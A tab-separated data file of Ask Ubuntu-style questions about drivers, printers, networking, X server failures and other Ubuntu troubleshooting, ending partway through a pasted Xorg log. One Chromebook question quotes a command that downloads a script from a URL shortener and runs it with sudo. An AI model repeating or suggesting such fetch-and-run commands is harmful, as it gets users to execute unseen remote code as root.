472214	32-bit ubuntu 14.04 support for nvidia geforce 5500	i have recently updated to ubuntu 14.04 on an old 32-bit dell dimension with a geforce 5500 video card . the update software suggested nvidia legacy binary driver - v 173.14.39 but loading it seemed to crash the system . examining the nvidia site this appears to be a 64-bit driver . should the 64-bit driver be compatible with 32-bit ubuntu 14.04 ? if not is there a source for a 32-bit ubuntu driver for the nvidia geforce 5500 ?
472219	how to install gcc-4.7-arm-linux-gnueabihf on ubuntu 12.04 ?	i want to install gcc-4.7-arm-linux-gnueabihf or greater on ubuntu 12.04 , any suggestion ? the default one is gcc-4.6-arm-linux-gnueabihf .
472220	change notification daemon on 14.04	in older versions of ubuntu , /usr/share/dbus-1/services/org.freedesktop.notifications.service could be edited to change the default notification daemon . however changing this file no longer affects the default notification daemon in the newer version . any ideas on how to change the default notification daemon ?
472221	get scanner working on epson wf-3540	i got the printer part of the machine working using drivers from the epson website . for the scanner function , i downloaded and installed iscan-data_1.28.0-2_all.deb and iscan_2.29.3-1~usb0.1.ltdl7_amd64.deb i 'm running ubuntu 13.10 on a 64 bit machine , and my scanner is just connected through with a usb cable ( through a hub , should not make a difference , but who knows ) , so i think that 's correct . i tried several scanners : image scan ! for linux , simple scan , xsane image scanning program , gscan2pdf , skanlite . most errors where quite terse : `` scanner busy '' or `` can not connect '' or something like that . g2scan gave a little more information : it found the machine , identified the type correctly , and then started its `` opening device '' routine until it crashed . so , where do i start from here ? is there any log that i should look at , perhaps ?
472222	does upstart chdir works with symlinks ?	currently in my upstart script , chdir points to a symlink ( soft ) . does chdir respect the symlink or goes directly to the symlinked directory ? the question why i ask this is because in a web server i use ( puma ) , pwd command now using the chdir stanza does not point to the symlink directory . see https : //github.com/puma/puma/issues/539 for more info . thank you .
472224	downside to disabling ibus ?	to edit documents on my google drive accessed via google chrome 35.0.1916.114 on lubuntu 14.04 , i find i need to use ibus exit only then can i enter anything . this is a known bug : chromium 34 from proposed does not take input from keyboard in first entry point on several webpages possibly because of the change to aura . but my question is whether i can put something like ibus exit in my autostart file safely . in other words , will i break something else ? i 've looked at man ibus and at https : //code.google.com/p/ibus/wiki/readme but could n't clarify my doubt .
472225	seting-up dansguardian on ubuntu 14.04	i 'm trying to setup dansguardian for the first time and having some troubles with it . i followed the instructions from `` web content filtering made easy '' as it was listed under ubunutu 's wiki page at parentalcontrols . i 'm using privoxy as my proxy server & i 'm trying to set this up on a 14.04 ubuntu installed to a laptop , not on a server . it seems to be blocking stuff i want to be blocked , but it 's also blocking stuff that i do n't want blocked . i ca n't lock google safe search . it hangs at 0 % for a while and then says `` oops . there was a problem locking safesearch '' . also , i 'm trying to use copyagent as a cloud backup , but it will not login . it hangs for a long time and then responds with curl failed to post data . i 'm convinced that it 's dansguardian that 's blocking these services , but it could be privoxy . can anyone help me setup dansguardian properly ?
472226	not able to uninstall mysql with apt-get	i had downloaded the generic linux 64 bit mysql 5.6.17 tar archive from http : //dev.mysql.com/downloads/mysql/ and installed on my 64 bit ubuntu 14.04 , following the instructions at http : //dev.mysql.com/doc/refman/5.6/en/binary-installation.html . i am having some problems with the server , so i want to uninstall and do a fresh installation . but if i try the usual apt-get remove mysql-server ( as per how do i uninstall mysql ? ) , i get : package 'mysql-server ' is not installed , so not removed i am guessing this is because i did not use apt-get to install in the first place . i had used scripts/mysql_install_db as per the instructions . so is there some other way to uninstall mysql server or is it ok to just delete the installation folder ? edit $ dpkg -- get-selections | grep -v deinstall | grep `` mysql '' gives the below result : libdbd-mysql-perl install libmysqlclient18 : amd64 install mysql-client install mysql-client-5.5 install mysql-client-core-5.5 install mysql-common install mysql-workbench-community install
472230	can i set up maas and juju on one machine ?	here is what i want to setup : maas on a single pc maas providing the host os for 4 vms ( 3 lxc + 1 kvm ) using juju to deploy services on the 4 vms ( nodes on maas ) how can i accomplish this ?
472232	cordova unable to add android platform	i have created a project and moved into that directory . when i am trying to add `` android platform '' to the project it gives an error . i have exported the path correctly . everything worked fine yesterday , but today this error occurred . the screenshot is ,
472236	android rom building . issue with jdk	the other day i was trying to build android rom using the aosp code . i had setup the environment according to the steps mentioned in their guide but i keep getting this error during the same checking build tools versions ... you are attempting to build with an unsupported jdk . this build requires openjdk , but you are using : java version `` 1.7.0_55 '' java ( tm ) se runtime environment ( build 1.7.0_55-b13 ) java hotspot ( tm ) 64-bit server vm ( build 24.55-b03 , mixed mode ) . please follow the machine setup instructions at https : //source.android.com/source/download.html build/core/main.mk:197 : * stop . stop . i 've already installed openjdk-7 on my machine and have already update-alternative to this openjdk . but nothing i do seems to be solving this error . hoping someone could help me here..
472239	importerror : can not import name gdl from gi.repository	trying to import the gnome docking library i get the exception : error : root : could not find any typelib for gdl ... from gi.repository import gtk , gdk , gdl importerror : can not import name gdl
472241	most programs do n't work after changing username	i changed my username using the following commands usermod -l new_name old_name usermod -d /home/new_name -m new_name* everything was fine until i started to use some programs . is there another command that i should enter ?
472245	automated installation of `` ubuntu-12.04.1-server-amd64 ''	the physical server contains two hdd , and raid1 mirror relation has been established between them as shown in attachment . in ks.cfg , the information related to partitioning as as follow : # partition clearing information clearpart -- all -- initlabel # disk partitioning information part / -- fstype ext4 -- size 307200 -- asprimary part swap -- size 30720 part /home -- fstype ext4 -- size 1 -- grow but i am getting the exception that `` there is no root file system defined '' . please suggest the command to include in ks.cfg ( kickstart configuration file )
472248	ca n't access recovery mode , for dual booting comp , by holding shift	i used wubi to install ubuntu without a cd or usb . i can not get my ( username - password ) combination to work even though i 'm 100 % sure i typed them in correctly when installing via wubi . i read this password-non-recognition is a common issue with wubi and that i can find out my username and password through some command line thing within recovery mode . i have a dual-booted setup with windows 7 and ubuntu in separate partitions . so when trying to access recovery mode i hold down the left-shift-key as soon as a press enter when choosing `` ubuntu '' as my operating system . when i do this , nothing happens and i load in to the login screen ( after around 15 seconds ) . i can not get to the screen that lets my choose to boot in recovery mode ( i think this screen is called grub ? ) i read that `` boot-repair '' might somehow fix this issue , but i do not have access to a usb or cd that i can use to install `` boot-repair . '' any ideas where i can go from here ?
472250	installing usb 3.0 drivers ubuntu 13.10	i 'm running ubuntu 13.10 on an asus g74sx laptop . i ca n't get anything out of my usb 3.0 port . output from lsusb : bus 002 device 004 : id 047b:0011 silitek corp. sk-1688u keyboard bus 002 device 003 : id 045e:0040 microsoft corp. wheel mouse optical bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 0bda:0139 realtek semiconductor corp. rts5139 card reader controller bus 001 device 003 : id 13d3:5134 imc networks bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub as you can see , the port does n't even show up . at one point it did , but not anymore . i do n't care if i can get the usb 3 speed ( i do n't own any usb 3 devices ) , i just want to be able to use the port . assistance is appreciated .
472252	blank desktop after installing ubuntu 14.04	i performed a clean install from an ubuntu 14.04 iso disk . when i login i get a blank desktop with only the ubuntu 14.04 logo showing in the lower left-hand corner of the screen . nothing comes up on the screen when i right-click my mouse . i have to power off my hp pc in order to try to reboot the computer . i have tried numerous suggestions from other threads with the same issue . i am fairly new to ubuntu and linux .
472258	hdmi is not displayed in the `` sound '' settings on ubuntu 14.04 lts	i need some assistance , i have 2 laptops , a toshiba and a dell xps m1330 , the problem is using my dell laptop , when i use the hdmi cable to use the tv as monitor the display works fine however the sound only work in the laptop speakers i ca n't use the tv speakers . when i go to `` sound '' settings to select the hdmi in the `` play sound through '' , i ca n't select the hdmi because it never show up . i can only see , `` headphones and speakers '' . so as a summary the , display works but the sound it does n't in the tv . any ideas ?
472262	adapt ubuntu to a high-dpi resolution screen	what are the steps you need to adapt ubuntu on a fresh installed laptop with a high resolution display ? i have a display with 3200x1600px on only 11 '' which is all realy tiny .
472263	no static connection established	i have ubuntu server 12.4 lts installed and ubuntu desktop on top of it . recently my internet/network connection stop working . my gigabit wired ethernet card is set to static . but does not connect to the network . when i change the static to dhcp it works fine but when i change back it does not . when i log in to ubuntu desktop ( gui ) the network manager only shows the 2nd ethernet adapter . the gigabit ethernet is grayed out & of cause no connection unless i connect the network cable for the 2nd ethernet card ... .. i hope i make sense here and some one can help . because i am dead in the water and my server is off line : (
472267	i installed ubuntu 12.04 on my dell inspiron 6400 lan / ethernet card does not work	root @ mm061 : ~ # lspci 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) 00:1c.3 pci bridge : intel corporation n10/ich 7 family pci express port 4 ( rev 01 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 01 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 01 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 01 ) 03:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 03:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 03:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 03:01.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 03:01.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 05 ) 0b:00.0 network controller : broadcom corporation bcm4311 802.11b/g wlan ( rev 01 ) in broadcom web : ( http : //www.broadcom.com/support/ethernet_nic/4401.php download this driver . the following are general guidelines for installing the driver . create a directory and extract the files : tar xvzf b44-.tar.gz build the driver b44.o ( or b44.ko ) as a loadable module for the running kernel : cd src make test the driver by loading it : insmod b44.o or insmod b44.ko ( on 2.6.x kernels ) or insmod b44 install the driver : make install see rpm instructions above for the location of the installed driver . to configure network protocol and address , refer to various linux documentations . root @ 123-mm061 : /home/123 # cd b44-1.00g/ root @ 123-mm061 : /home/123/b44-1.00g # ls b44.4 b44.c b44.h license makefile do not know what is the meaning of cd src ( cd /usr/src or cd usr/local/usr ) root @ vince-mm061 : /home/123/b44-1.00g # make gcc -dmodule -d__kernel__ -wall -wstrict-prototypes -i/lib/modules/3.2.0-23-generic-pae/build/include -dold_netif -dold_dma -dno_dma_mapping_error -o2 -c -o b44.o b44.c ubuntu 12.04 dell 6400 no network the issue is not resolved , can you help me . thanks !
472268	black screen freeze after logging in ubuntu desktop 14.04 lts	i am using ubuntu desktop 14.04 lts on an acer aspire-5742g with intel core i3 processor , 8 gb ram , 640 gb hdd and nvidia geforce 520m with 1gb memory . i ran bleachbit with sudo permissions form the terminal . in the gui that opened i checked all of the features in the left panel of the program , except those for which the system said they would take a long time to perform . i noticed that it deleted some files from the system folders , but i ignored that . after that i did a sudo apt-get update & & sudo apt-get upgrade and i rebooted my system . immediately after i logged in i got a black screen and the only thing i could do was to open a console by pressing ctrl+alt+f1 . i pressed enter , it asked me for my log in credentials . then i typed in display and got the following error : can not start x server - error/display.c/displayimagecommand/428 please tell me what sequence of commands should i enter to fix this . if you need additional information , please ask . although , i am still able to log in from the guest account . thank you in advance !
472269	how do i get a panasonic kx-flb 802 multi function printer working ?	i am unable to make the panasonic kx-flb 802 attached to the pc work . any suggestions ? searching for the it in the printers tool results in `` no matches found ''
472273	hdajackretask issue	i have hp pavillion m6 running ubuntu 14.04 . yesterday i followed a tutorial ( http : //ubuntuforums.org/showthread.php ? p=12489414 # post12489414 ) to fix my beat audio issue , after click at `` install boot override '' i did restart and now wifi , speakers and brightness controler keys has stoped working . and now hdajackretask is also not opening . when i try to run hdajackretask then it crashes . and when i try to run hdajackretask from terminal it show : ( hdajackretask:5611 ) : gtk-critical ** : gtk_combo_box_text_insert : assertion 'text ! = null ' failed segmentation fault ( core dumped ) kindly please help out me . : (
472277	ssh connection , using my private key from windows into ubuntu	i 'm using ssh connection on windows . i want to use the same connection on ubuntu , so i copied my private key and i pasted it into /root/.ssh but when i 'm doing ssh user @ server with the terminal , i 'm having this error message : permission denied ( publickey ) and the private key is working on windows . any idea what should be the correct procedure ?
472279	top panel shows on all three monitors ( ubuntu 14.04 )	is there a way to have it showing on only one ? i tried to switch between unity , gnome and gnome xxxx compiz in order to see what i liked the best , and i believe the three panels on the monitors then showed up after that , but they might have been on all three monitors at the same time since the beginning . anyone any ideas to have it showing on only one monitor ? this is what it looks like : http : //postimg.org/image/gy5tvgrxz/
472281	not able to install adobe air in ubuntu 14.04	i 'm trying to install adobe air in ubuntu 14.04 i used following commands to install , wget http : //airdownload.adobe.com/air/lin/download/latest/adobeairinstaller.bin sudo ln -s /usr/lib/x86_64-linux-gnu/libgnome-keyring.so.0 /usr/lib/libgnome-keyring.so.0 sudo ln -s /usr/lib/x86_64-linux-gnu/libgnome-keyring.so.0.2.0 /usr/lib/libgnome-keyring.so.0.2.0 sudo chmod +x adobeairinstaller.bin sudo ./adobeairinstaller.bin sudo apt-get install ia32-libs i ran all the commands , when i run the install command , i 'm getting an error message as ** '' /tmp/air.w7ip1x/setup : error while loading shared libraries : libgtk-x11-2.0.so.0 : can not open shared object file : no such file or directory '' ** how to fix this ?
472282	how to place a thin line on the screen	i am looking for an application on ubuntu 12.04 that would place a thin horizontal and/or vertical bi-colored , black and white line cross the screen . i do n't want a fancy cursor , just a plain line or crosshairs that would act as a pointer and could be moved by the mouse but would otherwise remain in place . i 've tried making a png file with a cross and using gimp to make the background transparent , but i have n't found an image viewer that does n't pop my image in a window that defeats the transparent background and includes unwanted decorations .
472283	ubuntu 12.04 is not detected by windows 7	once i installed ubuntu along with windows 7 it was working fine . later i was suppose to reinstall my windows 7 , from then i 'm not been able to login to ubuntu . i 'm not getting the option to choose ubuntu . though i installed both in different drives . please assist . thanks in advance .
472288	user has sudo access locally but not remotly	i 've got a ubuntu desktop installed as a vm on win 2012 server . i 've installed likewise active directory to allow domain users to log into the machine with windows credentials . in my sudoers file i 've added a windows group membership to allow sudo access to certain users . locally ( connecting to the ubuntu machine from hyper-v manager ) the ubuntu machine this works . my windows user can log in and has sudo access . however , when i use windows remote desktop connection my user is able to log in but does n't have sudo access . i get an error `` user username is not in the sudoers file , this will be reported . '' any ideas on how to fix this ?
472290	acer chromebook not booting ubuntu	i installed ubuntu on my acer c7 chromebook by using the command , wget http : //goo.gl/tnyga ; sudo bash tnyga it was working fine , but after a few days it boots in chrome os and unable to go back to ubuntu . i tried so many commands like ; sudo cgpt add -i 6 -p 5 -s 1 /dev/sda then i try to change the priority of the keren , but no changes . so can any one suggest any solutions ?
472292	menu is not visible on ubuntu using vmwareworkstation 10 on windows 8	i am new to linux distribution . i installed ubuntu 14.04 on windows 8.1 ( vmware workstation 10 ) . i have managed to successfully install it , however i do not see the menu when 3d is on in workstation and ubuntu is very slow if 3d is switched off . how do i get this resolved : the menu to appear when 3d in on ?
472293	move window from one desktop to another using drag and drop	up until i upgraded to kde 4.13.0 , i was able to drag an application from the taskbar to a desktop in the desktop-switcher on the task-bar . this would move that window to the other desktop . this does n't work any more . how can i re-enable it ?
472297	sharing phone 's internet connection on laptop without the help of usb cable	at the moment , i use my phone 's internet connection on my laptop by using a usb cable . how do i set things up to use internet using my phone without the usb cable . so , that i can get rid of the usb cable and use bluetooth instead ? i am using an android phone and i want to use my phones 3g data to give my laptop an internet connection in remote locations where i do n't have wifi access . plus my laptop does n't have wifi anyway , just bluetooth . so basically , how do i configure ubuntu so it can use the internet made available for my phones bluetooth connection which passes through the 3g connection to my computer ?
472298	datasize problem	i have a problem with the data size . the files and the directory’s are showed with the size . i don’t want to see the size of the files and directory . how can i deactivate it ? i am using ubuntu 12.04 .
472301	how to lock unity 's `` show desktop '' button	i have added a show desktop button to unity but it keeps moving down towards the bottom of the launcher . i want to pin and lock it in place , so that it is always under the ubuntu logo . how can i do that ?
472302	can not install any program through wine	i am currently using ubuntu 14.04 lts 64-bit version in my pc and i have installed wine software to run some .exe format files of windows in linux but it doesnt happen whenever i right click on the available file and select the option to install open it through wine it says access denied as shown in this image and when i tried to install subway surfers through this terminal command i get this error is there any solution for this question *edit
472306	why can not i update ?	i run lsb_release -a output : no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise i run : nano /etc/apt/sources.list output : deb mirror : //mirrors.ubuntu.com/mirrors.txt precise main universe deb mirror : //mirrors.ubuntu.com/mirrors.txt precise main-updates universe multiverse deb mirror : //mirrors.ubuntu.com/mirrors.txt precise main-backports universe multiverse deb mirror : //mirrors.ubuntu.com/mirrors.txt precise main-security universe multiverse i run sudo apt-get update outuput : hit http : //ftp.oleane.net/ubuntu/ precise release.gpg hit http : //ftp.oleane.net/ubuntu/ precise release hit http : //ftp.oleane.net/ubuntu/ precise/main i386 packages hit http : //ftp.oleane.net/ubuntu/ precise/universe i386 packages w : failed to fetch mirror : //mirrors.ubuntu.com/mirrors.txt/dists/precise/release unable to find expected entry 'main-updates/binary-i386/packages ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead .
472309	problems with xserver and nvidia : no screens found	i tried booting my pc this morning and everything looked much bigger ( e.g . the boot menu ) than usually . the xserver failed to start ( as the below output states ) : x.org x server 1.15.1 release date : 2014-04-13 x protocol version 11 , revision 0 build operating system : linux 3.2.0-37-generic x86_64 ubuntu current operating system : linux radogost 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:30:00 utc 2014 x86_64 kernel command line : boot_image=/boot/vmlinuz-3.13.0-24-generic root=uuid=e4f83085-428d-4a31-9110-62c15c2f7434 ro quiet splash build date : 16 april 2014 01:36:29pm xorg-server 2:1.15.1-0ubuntu2 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.30.2 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : mon may 26 10:44:45 2014 ( == ) using config file : `` /etc/x11/xorg.conf '' ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' initializing built-in extension generic event extension initializing built-in extension shape initializing built-in extension mit-shm initializing built-in extension xinputextension initializing built-in extension xtest initializing built-in extension big-requests initializing built-in extension sync initializing built-in extension xkeyboard initializing built-in extension xc-misc initializing built-in extension security initializing built-in extension xinerama initializing built-in extension xfixes initializing built-in extension render initializing built-in extension randr initializing built-in extension composite initializing built-in extension damage initializing built-in extension mit-screen-saver initializing built-in extension double-buffer initializing built-in extension record initializing built-in extension dpms initializing built-in extension present initializing built-in extension dri3 initializing built-in extension x-resource initializing built-in extension xvideo initializing built-in extension xvideo-motioncompensation initializing built-in extension selinux initializing built-in extension xfree86-vidmodeextension initializing built-in extension xfree86-dga initializing built-in extension xfree86-dri initializing built-in extension dri2 loading extension glx ( ee ) fatal server error : ( ee ) no screens found ( ee ) ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . ( ee ) please also check the log file at `` /var/log/xorg.0.log '' for additional information . ( ee ) ( ee ) server terminated with error ( 1 ) . closing log file . xinit : giving up xinit : unable to connect to x server : connection refused xinit : server error also , the output of /var/log/xorg.0.log shows : [ 48.626 ] x.org x server 1.15.1 release date : 2014-04-13 [ 48.626 ] x protocol version 11 , revision 0 [ 48.627 ] build operating system : linux 3.2.0-37-generic x86_64 ubuntu [ 48.627 ] current operating system : linux radogost 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:30:00 utc 2014 x86_64 [ 48.627 ] kernel command line : boot_image=/boot/vmlinuz-3.13.0-24-generic root=uuid=e4f83085-428d-4a31-9110-62c15c2f7434 ro quiet splash [ 48.627 ] build date : 16 april 2014 01:36:29pm [ 48.627 ] xorg-server 2:1.15.1-0ubuntu2 ( for technical support please see http : //www.ubuntu.com/support ) [ 48.627 ] current version of pixman : 0.30.2 [ 48.628 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 48.628 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 48.629 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : mon may 26 10:03:43 2014 [ 48.629 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 48.630 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 48.630 ] ( == ) serverlayout `` layout0 '' [ 48.630 ] ( ** ) | -- > screen `` screen0 '' ( 0 ) [ 48.630 ] ( ** ) | | -- > monitor `` monitor0 '' [ 48.630 ] ( ** ) | | -- > device `` device0 '' [ 48.630 ] ( ** ) | -- > input device `` keyboard0 '' [ 48.630 ] ( ** ) | -- > input device `` mouse0 '' [ 48.630 ] ( == ) automatically adding devices [ 48.630 ] ( == ) automatically enabling devices [ 48.630 ] ( == ) automatically adding gpu devices [ 48.630 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 48.630 ] entry deleted from font path . [ 48.630 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 48.630 ] entry deleted from font path . [ 48.630 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 48.630 ] entry deleted from font path . [ 48.630 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 48.630 ] entry deleted from font path . [ 48.630 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 48.630 ] entry deleted from font path . [ 48.630 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 48.630 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 48.630 ] ( ww ) hotplugging is on , devices using drivers 'kbd ' , 'mouse ' or 'vmmouse ' will be disabled . [ 48.630 ] ( ww ) disabling keyboard0 [ 48.630 ] ( ww ) disabling mouse0 [ 48.630 ] ( ii ) loader magic : 0x7f7154eb2d60 [ 48.630 ] ( ii ) module abi versions : [ 48.630 ] x.org ansi c emulation : 0.4 [ 48.630 ] x.org video driver : 15.0 [ 48.630 ] x.org xinput driver : 20.0 [ 48.630 ] x.org server extension : 8.0 [ 48.631 ] ( -- ) pci : * ( 0:1:0:0 ) 10de:1180:1043:83f0 rev 161 , mem @ 0xfa000000/16777216 , 0xf0000000/134217728 , 0xf8000000/33554432 , i/o @ 0x0000e000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 48.631 ] initializing built-in extension generic event extension [ 48.632 ] initializing built-in extension shape [ 48.632 ] initializing built-in extension mit-shm [ 48.632 ] initializing built-in extension xinputextension [ 48.632 ] initializing built-in extension xtest [ 48.632 ] initializing built-in extension big-requests [ 48.632 ] initializing built-in extension sync [ 48.632 ] initializing built-in extension xkeyboard [ 48.633 ] initializing built-in extension xc-misc [ 48.633 ] initializing built-in extension security [ 48.633 ] initializing built-in extension xinerama [ 48.633 ] initializing built-in extension xfixes [ 48.633 ] initializing built-in extension render [ 48.633 ] initializing built-in extension randr [ 48.633 ] initializing built-in extension composite [ 48.633 ] initializing built-in extension damage [ 48.634 ] initializing built-in extension mit-screen-saver [ 48.634 ] initializing built-in extension double-buffer [ 48.634 ] initializing built-in extension record [ 48.634 ] initializing built-in extension dpms [ 48.634 ] initializing built-in extension present [ 48.634 ] initializing built-in extension dri3 [ 48.634 ] initializing built-in extension x-resource [ 48.635 ] initializing built-in extension xvideo [ 48.635 ] initializing built-in extension xvideo-motioncompensation [ 48.635 ] initializing built-in extension selinux [ 48.635 ] initializing built-in extension xfree86-vidmodeextension [ 48.635 ] initializing built-in extension xfree86-dga [ 48.635 ] initializing built-in extension xfree86-dri [ 48.635 ] initializing built-in extension dri2 [ 48.635 ] ( ww ) `` glamoregl '' will not be loaded unless you 've specified it to be loaded elsewhere . [ 48.635 ] ( ii ) `` glx '' will be loaded by default . [ 48.635 ] ( ww ) `` xmir '' is not to be loaded by default . skipping . [ 48.635 ] ( ii ) loadmodule : `` glx '' [ 48.636 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/libglx.so [ 48.642 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 48.642 ] compiled for 4.0.2 , module version = 1.0.0 [ 48.642 ] module class : x.org server extension [ 48.642 ] ( ii ) nvidia glx module 304.117 tue nov 26 21:45:09 pst 2013 [ 48.642 ] loading extension glx [ 48.642 ] ( ii ) loadmodule : `` nvidia '' [ 48.642 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 48.642 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 48.642 ] compiled for 4.0.2 , module version = 1.0.0 [ 48.642 ] module class : x.org video driver [ 48.643 ] ( ii ) nvidia dlloader x driver 304.117 tue nov 26 21:27:08 pst 2013 [ 48.643 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 48.643 ] ( -- ) using vt number 7 [ 48.646 ] ( ii ) loading sub module `` fb '' [ 48.646 ] ( ii ) loadmodule : `` fb '' [ 48.646 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 48.646 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 48.646 ] compiled for 1.15.1 , module version = 1.0.0 [ 48.646 ] abi class : x.org ansi c emulation , version 0.4 [ 48.646 ] ( ii ) loading sub module `` wfb '' [ 48.646 ] ( ii ) loadmodule : `` wfb '' [ 48.646 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 48.646 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 48.646 ] compiled for 1.15.1 , module version = 1.0.0 [ 48.646 ] abi class : x.org ansi c emulation , version 0.4 [ 48.646 ] ( ii ) loading sub module `` ramdac '' [ 48.646 ] ( ii ) loadmodule : `` ramdac '' [ 48.646 ] ( ii ) module `` ramdac '' already built-in [ 48.646 ] ( ** ) nvidia ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 48.646 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 48.646 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 48.646 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 48.646 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 48.967 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce gtx 680 ( gk104 ) at pci:1:0:0 ( gpu-0 ) [ 48.967 ] ( -- ) nvidia ( 0 ) : memory : 2097152 kbytes [ 48.967 ] ( -- ) nvidia ( 0 ) : videobios : 80.04.09.00.0f [ 48.967 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 48.967 ] ( -- ) nvidia ( 0 ) : interlaced video modes are supported on this gpu [ 48.970 ] ( -- ) nvidia ( 0 ) : valid display device ( s ) on geforce gtx 680 at pci:1:0:0 [ 48.970 ] ( -- ) nvidia ( 0 ) : crt-0 [ 48.970 ] ( -- ) nvidia ( 0 ) : dfp-0 [ 48.970 ] ( -- ) nvidia ( 0 ) : dfp-1 [ 48.970 ] ( -- ) nvidia ( 0 ) : dfp-2 [ 48.970 ] ( -- ) nvidia ( 0 ) : dfp-3 [ 48.970 ] ( -- ) nvidia ( 0 ) : dfp-4 [ 48.970 ] ( -- ) nvidia ( 0 ) : crt-0 : 400.0 mhz maximum pixel clock [ 48.970 ] ( -- ) nvidia ( 0 ) : dfp-0 : 330.0 mhz maximum pixel clock [ 48.970 ] ( -- ) nvidia ( 0 ) : dfp-0 : internal single link tmds [ 48.970 ] ( -- ) nvidia ( 0 ) : dfp-1 : 165.0 mhz maximum pixel clock [ 48.970 ] ( -- ) nvidia ( 0 ) : dfp-1 : internal single link tmds [ 48.970 ] ( -- ) nvidia ( 0 ) : dfp-2 : 165.0 mhz maximum pixel clock [ 48.970 ] ( -- ) nvidia ( 0 ) : dfp-2 : internal single link tmds [ 48.970 ] ( -- ) nvidia ( 0 ) : dfp-3 : 330.0 mhz maximum pixel clock [ 48.970 ] ( -- ) nvidia ( 0 ) : dfp-3 : internal single link tmds [ 48.970 ] ( -- ) nvidia ( 0 ) : dfp-4 : 960.0 mhz maximum pixel clock [ 48.970 ] ( -- ) nvidia ( 0 ) : dfp-4 : internal displayport [ 48.971 ] ( ee ) nvidia ( 0 ) : failed to assign any connected display devices to x screen 0 [ 49.002 ] ( ee ) nvidia ( 0 ) : failing initialization of x screen 0 [ 49.167 ] ( ii ) unloadmodule : `` nvidia '' [ 49.167 ] ( ii ) unloadsubmodule : `` wfb '' [ 49.167 ] ( ii ) unloadsubmodule : `` fb '' [ 49.167 ] ( ee ) screen ( s ) found , but none have a usable configuration . [ 49.167 ] ( ee ) fatal server error : [ 49.167 ] ( ee ) no screens found ( ee ) [ 